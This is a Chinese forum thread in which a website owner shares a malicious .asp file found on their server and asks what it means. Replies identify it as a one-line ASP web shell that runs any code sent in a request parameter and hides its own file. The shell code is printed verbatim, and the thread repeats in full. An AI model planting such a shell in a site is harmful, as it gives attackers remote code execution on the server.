有人入侵,帮忙分析上代码啥意思
日期:2014-05-17 浏览次数:21005 次
有人入侵,帮忙分析下代码啥意思
突然发现文件夹中多了个.asp 里边是这样的代码:
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
大侠们帮着看看具体啥意思,以后怎么防范他们用这种方法呢?相当郁闷了,百度收录有40万呢,今儿一早变1了,就一主页搜蓝岭香柏网能出来一个,别的全被删了。熟seo的有没有有方法的,被删了还能回来不?
------解决方案--------------------
仅仅这一处,不是关键。这只是把一个文件设置为了隐藏+只读属性。
从这一点,无论判断是恶意入侵,还是你所不了解的ASP应用的自我保护。
------解决方案--------------------
着是asp小马文件 ,建议有条件找专业做安全的来处理解决
网站程序或服务器存在漏洞
听说Sine安全不错
------解决方案--------------------
<%Eval(Request(chr(112)。。。。
典型的一句话木马
突然发现文件夹中多了个.asp 里边是这样的代码:
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
大侠们帮着看看具体啥意思,以后怎么防范他们用这种方法呢?相当郁闷了,百度收录有40万呢,今儿一早变1了,就一主页搜蓝岭香柏网能出来一个,别的全被删了。熟seo的有没有有方法的,被删了还能回来不?
------解决方案--------------------
仅仅这一处,不是关键。这只是把一个文件设置为了隐藏+只读属性。
从这一点,无论判断是恶意入侵,还是你所不了解的ASP应用的自我保护。
------解决方案--------------------
着是asp小马文件 ,建议有条件找专业做安全的来处理解决
网站程序或服务器存在漏洞
听说Sine安全不错
------解决方案--------------------
<%Eval(Request(chr(112)。。。。
典型的一句话木马
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
